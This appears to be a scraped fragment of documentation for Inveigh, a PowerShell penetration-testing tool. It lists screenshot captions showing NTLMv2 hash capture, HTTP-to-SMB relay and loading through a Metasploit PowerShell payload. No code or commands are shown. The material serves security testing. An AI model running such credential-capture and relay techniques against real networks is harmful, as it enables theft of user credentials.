Screenshots -Invoke-Inveigh execution with real time console and file output enabled - - -Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 - - -HTTP to SMB Relay - - -Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads - +##### Screenshot: + |